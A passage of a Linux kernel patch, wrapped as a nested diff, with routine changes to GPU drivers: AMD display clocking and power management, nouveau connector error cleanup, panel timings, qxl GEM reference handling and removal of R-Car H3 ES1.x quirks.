+ 			amdgpu_dm_update_freesync_caps(
+ 					connector, aconnector->edid);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h
+index 915a20461c77c..893c0809cd4e0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_dccg.h
+@@ -230,7 +230,8 @@
+ 	type DTBCLK_P2_SRC_SEL;\
+ 	type DTBCLK_P2_EN;\
+ 	type DTBCLK_P3_SRC_SEL;\
+-	type DTBCLK_P3_EN;
++	type DTBCLK_P3_EN;\
++	type DENTIST_DISPCLK_CHG_DONE;
+ 
+ struct dccg_shift {
+ 	DCCG_REG_FIELD_LIST(uint8_t)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index 7d2b982506fd7..cef32a1f91cdc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -47,6 +47,14 @@ void dccg31_update_dpp_dto(struct dccg *dccg, int dpp_inst, int req_dppclk)
+ {
+ 	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
+ 
++	if (dccg->dpp_clock_gated[dpp_inst]) {
++		/*
++		 * Do not update the DPPCLK DTO if the clock is stopped.
++		 * It is treated the same as if the pipe itself were in PG.
++		 */
++		return;
++	}
++
+ 	if (dccg->ref_dppclk && req_dppclk) {
+ 		int ref_dppclk = dccg->ref_dppclk;
+ 		int modulo, phase;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+index 85ea3334355c2..b74705c1c8dcc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+@@ -296,6 +296,9 @@ static void dccg314_dpp_root_clock_control(
+ {
+ 	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
+ 
++	if (dccg->dpp_clock_gated[dpp_inst] != clock_on)
++		return;
++
+ 	if (clock_on) {
+ 		/* turn off the DTO and leave phase/modulo at max */
+ 		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 0);
+@@ -309,6 +312,8 @@ static void dccg314_dpp_root_clock_control(
+ 			  DPPCLK0_DTO_PHASE, 0,
+ 			  DPPCLK0_DTO_MODULO, 1);
+ 	}
++
++	dccg->dpp_clock_gated[dpp_inst] = !clock_on;
+ }
+ 
+ static const struct dccg_funcs dccg314_funcs = {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index b7782433ce6ba..503ab45b4ace3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -920,6 +920,22 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 			.afmt = true,
+ 		}
+ 	},
++
++	.root_clock_optimization = {
++			.bits = {
++					.dpp = true,
++					.dsc = false,
++					.hdmistream = false,
++					.hdmichar = false,
++					.dpstream = false,
++					.symclk32_se = false,
++					.symclk32_le = false,
++					.symclk_fe = false,
++					.physymclk = false,
++					.dpiasymclk = false,
++			}
++	},
++
+ 	.seamless_boot_odm_combine = true
+ };
+ 
+@@ -1917,6 +1933,10 @@ static bool dcn314_resource_construct(
+ 		dc->debug = debug_defaults_drv;
+ 	else
+ 		dc->debug = debug_defaults_diags;
++
++	/* Disable root clock optimization */
++	dc->debug.root_clock_optimization.u32All = 0;
++
+ 	// Init the vm_helper
+ 	if (dc->vm_helper)
+ 		vm_helper_init(dc->vm_helper, 16);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index 3fb4bcc343531..ffbb739d85b69 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -42,6 +42,20 @@
+ #define DC_LOGGER \
+ 	dccg->ctx->logger
+ 
++/* This function is a workaround for writing to OTG_PIXEL_RATE_DIV
++ * without the probability of causing a DIG FIFO error.
++ */
++static void dccg32_wait_for_dentist_change_done(
++	struct dccg *dccg)
++{
++	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
++
++	uint32_t dentist_dispclk_value = REG_READ(DENTIST_DISPCLK_CNTL);
++
++	REG_WRITE(DENTIST_DISPCLK_CNTL, dentist_dispclk_value);
++	REG_WAIT(DENTIST_DISPCLK_CNTL, DENTIST_DISPCLK_CHG_DONE, 1, 50, 2000);
++}
++
+ static void dccg32_get_pixel_rate_div(
+ 		struct dccg *dccg,
+ 		uint32_t otg_inst,
+@@ -110,21 +124,29 @@ static void dccg32_set_pixel_rate_div(
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG0_PIXEL_RATE_DIVK1, k1,
+ 				OTG0_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	case 1:
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG1_PIXEL_RATE_DIVK1, k1,
+ 				OTG1_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	case 2:
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG2_PIXEL_RATE_DIVK1, k1,
+ 				OTG2_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	case 3:
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_DIV,
+ 				OTG3_PIXEL_RATE_DIVK1, k1,
+ 				OTG3_PIXEL_RATE_DIVK2, k2);
++
++		dccg32_wait_for_dentist_change_done(dccg);
+ 		break;
+ 	default:
+ 		BREAK_TO_DEBUGGER();
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h
+index 1c46fad0977bf..fc3c9c650d43c 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.h
+@@ -147,7 +147,8 @@
+ 	DCCG_SF(DTBCLK_P_CNTL, DTBCLK_P3_SRC_SEL, mask_sh),\
+ 	DCCG_SF(DTBCLK_P_CNTL, DTBCLK_P3_EN, mask_sh),\
+ 	DCCG_SF(DCCG_AUDIO_DTO_SOURCE, DCCG_AUDIO_DTO_SEL, mask_sh),\
+-	DCCG_SF(DCCG_AUDIO_DTO_SOURCE, DCCG_AUDIO_DTO0_SOURCE_SEL, mask_sh)
++	DCCG_SF(DCCG_AUDIO_DTO_SOURCE, DCCG_AUDIO_DTO0_SOURCE_SEL, mask_sh),\
++	DCCG_SF(DENTIST_DISPCLK_CNTL, DENTIST_DISPCLK_CHG_DONE, mask_sh)
+ 
+ 
+ struct dccg *dccg32_create(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index f5fa7abd97fc7..d477dcc9149fa 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1177,7 +1177,7 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+ 		else
+ 			*k2_div = PIXEL_RATE_DIV_BY_4;
+-	} else if (dc_is_dp_signal(stream->signal)) {
++	} else if (dc_is_dp_signal(stream->signal) || dc_is_virtual_signal(stream->signal)) {
+ 		if (two_pix_per_container) {
+ 			*k1_div = PIXEL_RATE_DIV_BY_1;
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index 026cf13d203fc..03cdfb5577888 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -1272,7 +1272,8 @@ unsigned int dcn32_calc_num_avail_chans_for_mall(struct dc *dc, int num_chans);
+       DCCG_SRII(PHASE, DTBCLK_DTO, 0), DCCG_SRII(PHASE, DTBCLK_DTO, 1),        \
+       DCCG_SRII(PHASE, DTBCLK_DTO, 2), DCCG_SRII(PHASE, DTBCLK_DTO, 3),        \
+       SR(DCCG_AUDIO_DTBCLK_DTO_MODULO), SR(DCCG_AUDIO_DTBCLK_DTO_PHASE),       \
+-      SR(OTG_PIXEL_RATE_DIV), SR(DTBCLK_P_CNTL), SR(DCCG_AUDIO_DTO_SOURCE)     \
++      SR(OTG_PIXEL_RATE_DIV), SR(DTBCLK_P_CNTL),                               \
++      SR(DCCG_AUDIO_DTO_SOURCE), SR(DENTIST_DISPCLK_CNTL)                      \
+   )
+ 
+ /* VMID */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 2bb768413c92a..19f55657272e4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -808,7 +808,7 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					v->SwathHeightC[k],
+ 					TWait,
+ 					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
+-						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= MIN_DCFCLK_FREQ_MHZ) ?
++						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+@@ -3289,7 +3289,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->swath_width_chroma_ub_this_state[k],
+ 							v->SwathHeightYThisState[k],
+ 							v->SwathHeightCThisState[k], v->TWait,
+-							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= MIN_DCFCLK_FREQ_MHZ) ?
++							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
+ 
+ 							/* Output */
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+index e92eee2c664d0..a475775bc3894 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.h
+@@ -52,7 +52,7 @@
+ #define BPP_BLENDED_PIPE 0xffffffff
+ 
+ #define MEM_STROBE_FREQ_MHZ 1600
+-#define MIN_DCFCLK_FREQ_MHZ 200
++#define DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ 300
+ #define MEM_STROBE_MAX_DELIVERY_TIME_US 60.0
+ 
+ struct display_mode_lib;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+index ad6acd1b34e1d..9651cccb084a3 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/dccg.h
+@@ -68,6 +68,7 @@ struct dccg {
+ 	const struct dccg_funcs *funcs;
+ 	int pipe_dppclk_khz[MAX_PIPES];
+ 	int ref_dppclk;
++	bool dpp_clock_gated[MAX_PIPES];
+ 	//int dtbclk_khz[MAX_PIPES];/* TODO needs to be removed */
+ 	//int audio_dtbclk_khz;/* TODO needs to be removed */
+ 	//int ref_dtbclk_khz;/* TODO needs to be removed */
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index d191ff52d4f06..a664a0a284784 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1562,9 +1562,9 @@ static int smu_disable_dpms(struct smu_context *smu)
+ 
+ 	/*
+ 	 * For SMU 13.0.4/11, PMFW will handle the features disablement properly
+-	 * for gpu reset case. Driver involvement is unnecessary.
++	 * for gpu reset and S0i3 cases. Driver involvement is unnecessary.
+ 	 */
+-	if (amdgpu_in_reset(adev)) {
++	if (amdgpu_in_reset(adev) || adev->in_s0ix) {
+ 		switch (adev->ip_versions[MP1_HWIP][0]) {
+ 		case IP_VERSION(13, 0, 4):
+ 		case IP_VERSION(13, 0, 11):
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 31835d96deef9..839a812e0da32 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -588,7 +588,9 @@ err0_out:
+ 	return -ENOMEM;
+ }
+ 
+-static uint32_t sienna_cichlid_get_throttler_status_locked(struct smu_context *smu)
++static uint32_t sienna_cichlid_get_throttler_status_locked(struct smu_context *smu,
++							   bool use_metrics_v3,
++							   bool use_metrics_v2)
+ {
+ 	struct smu_table_context *smu_table= &smu->smu_table;
+ 	SmuMetricsExternal_t *metrics_ext =
+@@ -596,13 +598,11 @@ static uint32_t sienna_cichlid_get_throttler_status_locked(struct smu_context *s
+ 	uint32_t throttler_status = 0;
+ 	int i;
+ 
+-	if ((smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 7)) &&
+-	     (smu->smc_fw_version >= 0x3A4900)) {
++	if (use_metrics_v3) {
+ 		for (i = 0; i < THROTTLER_COUNT; i++)
+ 			throttler_status |=
+ 				(metrics_ext->SmuMetrics_V3.ThrottlingPercentage[i] ? 1U << i : 0);
+-	} else if ((smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 7)) &&
+-	     (smu->smc_fw_version >= 0x3A4300)) {
++	} else if (use_metrics_v2) {
+ 		for (i = 0; i < THROTTLER_COUNT; i++)
+ 			throttler_status |=
+ 				(metrics_ext->SmuMetrics_V2.ThrottlingPercentage[i] ? 1U << i : 0);
+@@ -864,7 +864,7 @@ static int sienna_cichlid_get_smu_metrics_data(struct smu_context *smu,
+ 			metrics->TemperatureVrSoc) * SMU_TEMPERATURE_UNITS_PER_CENTIGRADES;
+ 		break;
+ 	case METRICS_THROTTLER_STATUS:
+-		*value = sienna_cichlid_get_throttler_status_locked(smu);
++		*value = sienna_cichlid_get_throttler_status_locked(smu, use_metrics_v3, use_metrics_v2);
+ 		break;
+ 	case METRICS_CURR_FANSPEED:
+ 		*value = use_metrics_v3 ? metrics_v3->CurrFanSpeed :
+@@ -4017,7 +4017,7 @@ static ssize_t sienna_cichlid_get_gpu_metrics(struct smu_context *smu,
+ 	gpu_metrics->current_dclk1 = use_metrics_v3 ? metrics_v3->CurrClock[PPCLK_DCLK_1] :
+ 		use_metrics_v2 ? metrics_v2->CurrClock[PPCLK_DCLK_1] : metrics->CurrClock[PPCLK_DCLK_1];
+ 
+-	gpu_metrics->throttle_status = sienna_cichlid_get_throttler_status_locked(smu);
++	gpu_metrics->throttle_status = sienna_cichlid_get_throttler_status_locked(smu, use_metrics_v3, use_metrics_v2);
+ 	gpu_metrics->indep_throttle_status =
+ 			smu_cmn_get_indep_throttler_status(gpu_metrics->throttle_status,
+ 							   sienna_cichlid_throttler_map);
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index a15e09b551708..2c2e0f041f869 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -2727,7 +2727,7 @@ static struct intel_sdvo_connector *intel_sdvo_connector_alloc(void)
+ 	__drm_atomic_helper_connector_reset(&sdvo_connector->base.base,
+ 					    &conn_state->base.base);
+ 
+-	INIT_LIST_HEAD(&sdvo_connector->base.panel.fixed_modes);
++	intel_panel_init_alloc(&sdvo_connector->base);
+ 
+ 	return sdvo_connector;
+ }
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index 49c5451cdfb16..d6dd79541f6a9 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -1407,8 +1407,7 @@ nouveau_connector_create(struct drm_device *dev,
+ 		ret = nvif_conn_ctor(&disp->disp, nv_connector->base.name, nv_connector->index,
+ 				     &nv_connector->conn);
+ 		if (ret) {
+-			kfree(nv_connector);
+-			return ERR_PTR(ret);
++			goto drm_conn_err;
+ 		}
+ 	}
+ 
+@@ -1470,4 +1469,9 @@ nouveau_connector_create(struct drm_device *dev,
+ 
+ 	drm_connector_register(connector);
+ 	return connector;
++
++drm_conn_err:
++	drm_connector_cleanup(connector);
++	kfree(nv_connector);
++	return ERR_PTR(ret);
+ }
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index f851aaf2c5917..5e067ba7e5fba 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -969,21 +969,21 @@ static const struct panel_desc auo_g104sn02 = {
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+-static const struct drm_display_mode auo_g121ean01_mode = {
+-	.clock = 66700,
+-	.hdisplay = 1280,
+-	.hsync_start = 1280 + 58,
+-	.hsync_end = 1280 + 58 + 8,
+-	.htotal = 1280 + 58 + 8 + 70,
+-	.vdisplay = 800,
+-	.vsync_start = 800 + 6,
+-	.vsync_end = 800 + 6 + 4,
+-	.vtotal = 800 + 6 + 4 + 10,
++static const struct display_timing auo_g121ean01_timing = {
++	.pixelclock = { 60000000, 74400000, 90000000 },
++	.hactive = { 1280, 1280, 1280 },
++	.hfront_porch = { 20, 50, 100 },
++	.hback_porch = { 20, 50, 100 },
++	.hsync_len = { 30, 100, 200 },
++	.vactive = { 800, 800, 800 },
++	.vfront_porch = { 2, 10, 25 },
++	.vback_porch = { 2, 10, 25 },
++	.vsync_len = { 4, 18, 50 },
+ };
+ 
+ static const struct panel_desc auo_g121ean01 = {
+-	.modes = &auo_g121ean01_mode,
+-	.num_modes = 1,
++	.timings = &auo_g121ean01_timing,
++	.num_timings = 1,
+ 	.bpc = 8,
+ 	.size = {
+ 		.width = 261,
+diff --git a/drivers/gpu/drm/qxl/qxl_drv.h b/drivers/gpu/drm/qxl/qxl_drv.h
+index 432758ad39a35..94753e017ea8d 100644
+--- a/drivers/gpu/drm/qxl/qxl_drv.h
++++ b/drivers/gpu/drm/qxl/qxl_drv.h
+@@ -312,7 +312,7 @@ int qxl_gem_object_create_with_handle(struct qxl_device *qdev,
+ 				      u32 domain,
+ 				      size_t size,
+ 				      struct qxl_surface *surf,
+-				      struct qxl_bo **qobj,
++				      struct drm_gem_object **gobj,
+ 				      uint32_t *handle);
+ void qxl_gem_object_free(struct drm_gem_object *gobj);
+ int qxl_gem_object_open(struct drm_gem_object *obj, struct drm_file *file_priv);
+diff --git a/drivers/gpu/drm/qxl/qxl_dumb.c b/drivers/gpu/drm/qxl/qxl_dumb.c
+index d636ba6854513..17df5c7ccf691 100644
+--- a/drivers/gpu/drm/qxl/qxl_dumb.c
++++ b/drivers/gpu/drm/qxl/qxl_dumb.c
+@@ -34,6 +34,7 @@ int qxl_mode_dumb_create(struct drm_file *file_priv,
+ {
+ 	struct qxl_device *qdev = to_qxl(dev);
+ 	struct qxl_bo *qobj;
++	struct drm_gem_object *gobj;
+ 	uint32_t handle;
+ 	int r;
+ 	struct qxl_surface surf;
+@@ -62,11 +63,13 @@ int qxl_mode_dumb_create(struct drm_file *file_priv,
+ 
+ 	r = qxl_gem_object_create_with_handle(qdev, file_priv,
+ 					      QXL_GEM_DOMAIN_CPU,
+-					      args->size, &surf, &qobj,
++					      args->size, &surf, &gobj,
+ 					      &handle);
+ 	if (r)
+ 		return r;
++	qobj = gem_to_qxl_bo(gobj);
+ 	qobj->is_dumb = true;
++	drm_gem_object_put(gobj);
+ 	args->pitch = pitch;
+ 	args->handle = handle;
+ 	return 0;
+diff --git a/drivers/gpu/drm/qxl/qxl_gem.c b/drivers/gpu/drm/qxl/qxl_gem.c
+index a08da0bd9098b..fc5e3763c3595 100644
+--- a/drivers/gpu/drm/qxl/qxl_gem.c
++++ b/drivers/gpu/drm/qxl/qxl_gem.c
+@@ -72,32 +72,41 @@ int qxl_gem_object_create(struct qxl_device *qdev, int size,
+ 	return 0;
+ }
+ 
++/*
++ * If the caller passed a valid gobj pointer, it is responsible to call
++ * drm_gem_object_put() when it no longer needs to acess the object.
++ *
++ * If gobj is NULL, it is handled internally.
++ */
+ int qxl_gem_object_create_with_handle(struct qxl_device *qdev,
+ 				      struct drm_file *file_priv,
+ 				      u32 domain,
+ 				      size_t size,
+ 				      struct qxl_surface *surf,
+-				      struct qxl_bo **qobj,
++				      struct drm_gem_object **gobj,
+ 				      uint32_t *handle)
+ {
+-	struct drm_gem_object *gobj;
+ 	int r;
++	struct drm_gem_object *local_gobj;
+ 
+-	BUG_ON(!qobj);
+ 	BUG_ON(!handle);
+ 
+ 	r = qxl_gem_object_create(qdev, size, 0,
+ 				  domain,
+ 				  false, false, surf,
+-				  &gobj);
++				  &local_gobj);
+ 	if (r)
+ 		return -ENOMEM;
+-	r = drm_gem_handle_create(file_priv, gobj, handle);
++	r = drm_gem_handle_create(file_priv, local_gobj, handle);
+ 	if (r)
+ 		return r;
+-	/* drop reference from allocate - handle holds it now */
+-	*qobj = gem_to_qxl_bo(gobj);
+-	drm_gem_object_put(gobj);
++
++	if (gobj)
++		*gobj = local_gobj;
++	else
++		/* drop reference from allocate - handle holds it now */
++		drm_gem_object_put(local_gobj);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/qxl/qxl_ioctl.c b/drivers/gpu/drm/qxl/qxl_ioctl.c
+index 30f58b21372aa..dd0f834d881ce 100644
+--- a/drivers/gpu/drm/qxl/qxl_ioctl.c
++++ b/drivers/gpu/drm/qxl/qxl_ioctl.c
+@@ -38,7 +38,6 @@ int qxl_alloc_ioctl(struct drm_device *dev, void *data, struct drm_file *file_pr
+ 	struct qxl_device *qdev = to_qxl(dev);
+ 	struct drm_qxl_alloc *qxl_alloc = data;
+ 	int ret;
+-	struct qxl_bo *qobj;
+ 	uint32_t handle;
+ 	u32 domain = QXL_GEM_DOMAIN_VRAM;
+ 
+@@ -50,7 +49,7 @@ int qxl_alloc_ioctl(struct drm_device *dev, void *data, struct drm_file *file_pr
+ 						domain,
+ 						qxl_alloc->size,
+ 						NULL,
+-						&qobj, &handle);
++						NULL, &handle);
+ 	if (ret) {
+ 		DRM_ERROR("%s: failed to create gem ret=%d\n",
+ 			  __func__, ret);
+@@ -386,7 +385,6 @@ int qxl_alloc_surf_ioctl(struct drm_device *dev, void *data, struct drm_file *fi
+ {
+ 	struct qxl_device *qdev = to_qxl(dev);
+ 	struct drm_qxl_alloc_surf *param = data;
+-	struct qxl_bo *qobj;
+ 	int handle;
+ 	int ret;
+ 	int size, actual_stride;
+@@ -406,7 +404,7 @@ int qxl_alloc_surf_ioctl(struct drm_device *dev, void *data, struct drm_file *fi
+ 						QXL_GEM_DOMAIN_SURFACE,
+ 						size,
+ 						&surf,
+-						&qobj, &handle);
++						NULL, &handle);
+ 	if (ret) {
+ 		DRM_ERROR("%s: failed to create gem ret=%d\n",
+ 			  __func__, ret);
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+index b7dd59fe119e6..9edb5edb2bad9 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+@@ -223,20 +223,6 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		 * DU channels that have a display PLL can't use the internal
+ 		 * system clock, and have no internal clock divider.
+ 		 */
+-
+-		/*
+-		 * The H3 ES1.x exhibits dot clock duty cycle stability issues.
+-		 * We can work around them by configuring the DPLL to twice the
+-		 * desired frequency, coupled with a /2 post-divider. Restrict
+-		 * the workaround to H3 ES1.x as ES2.0 and all other SoCs have
+-		 * no post-divider when a display PLL is present (as shown by
+-		 * the workaround breaking HDMI output on M3-W during testing).
+-		 */
+-		if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY) {
+-			target *= 2;
+-			div = 1;
+-		}
+-
+ 		extclk = clk_get_rate(rcrtc->extclock);
+ 		rcar_du_dpll_divider(rcrtc, &dpll, extclk, target);
+ 
+@@ -245,30 +231,13 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		       | DPLLCR_N(dpll.n) | DPLLCR_M(dpll.m)
+ 		       | DPLLCR_STBY;
+ 
+-		if (rcrtc->index == 1) {
++		if (rcrtc->index == 1)
+ 			dpllcr |= DPLLCR_PLCS1
+ 			       |  DPLLCR_INCS_DOTCLKIN1;
+-		} else {
+-			dpllcr |= DPLLCR_PLCS0_PLL
++		else
++			dpllcr |= DPLLCR_PLCS0
+ 			       |  DPLLCR_INCS_DOTCLKIN0;
+ 
+-			/*
+-			 * On ES2.x we have a single mux controlled via bit 21,
+-			 * which selects between DCLKIN source (bit 21 = 0) and
+-			 * a PLL source (bit 21 = 1), where the PLL is always
+-			 * PLL1.
+-			 *
+-			 * On ES1.x we have an additional mux, controlled
+-			 * via bit 20, for choosing between PLL0 (bit 20 = 0)
+-			 * and PLL1 (bit 20 = 1). We always want to use PLL1,
+-			 * so on ES1.x, in addition to setting bit 21, we need
+-			 * to set the bit 20.
+-			 */
+-
+-			if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PLL)
+-				dpllcr |= DPLLCR_PLCS0_H3ES1X_PLL1;
+-		}
+-
+ 		rcar_du_group_write(rcrtc->group, DPLLCR, dpllcr);
+ 
+ 		escr = ESCR_DCLKSEL_DCLKIN | div;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.c b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+index 6381578c4db58..bd7003d6e0753 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+@@ -16,7 +16,6 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/slab.h>
+-#include <linux/sys_soc.h>
+ #include <linux/wait.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+@@ -387,43 +386,6 @@ static const struct rcar_du_device_info rcar_du_r8a7795_info = {
+ 	.dpll_mask =  BIT(2) | BIT(1),
+ };
+ 
+-static const struct rcar_du_device_info rcar_du_r8a7795_es1_info = {
+-	.gen = 3,
+-	.features = RCAR_DU_FEATURE_CRTC_IRQ
+-		  | RCAR_DU_FEATURE_CRTC_CLOCK
+-		  | RCAR_DU_FEATURE_VSP1_SOURCE
+-		  | RCAR_DU_FEATURE_INTERLACED
+-		  | RCAR_DU_FEATURE_TVM_SYNC,
+-	.quirks = RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY
+-		| RCAR_DU_QUIRK_H3_ES1_PLL,
+-	.channels_mask = BIT(3) | BIT(2) | BIT(1) | BIT(0),
+-	.routes = {
+-		/*
+-		 * R8A7795 has one RGB output, two HDMI outputs and one
+-		 * LVDS output.
+-		 */
+-		[RCAR_DU_OUTPUT_DPAD0] = {
+-			.possible_crtcs = BIT(3),
+-			.port = 0,
+-		},
+-		[RCAR_DU_OUTPUT_HDMI0] = {
+-			.possible_crtcs = BIT(1),
+-			.port = 1,
+-		},
+-		[RCAR_DU_OUTPUT_HDMI1] = {
+-			.possible_crtcs = BIT(2),
+-			.port = 2,
+-		},
+-		[RCAR_DU_OUTPUT_LVDS0] = {
+-			.possible_crtcs = BIT(0),
+-			.port = 3,
+-		},
+-	},
+-	.num_lvds = 1,
+-	.num_rpf = 5,
+-	.dpll_mask =  BIT(2) | BIT(1),
+-};
+-
+ static const struct rcar_du_device_info rcar_du_r8a7796_info = {
+ 	.gen = 3,
+ 	.features = RCAR_DU_FEATURE_CRTC_IRQ
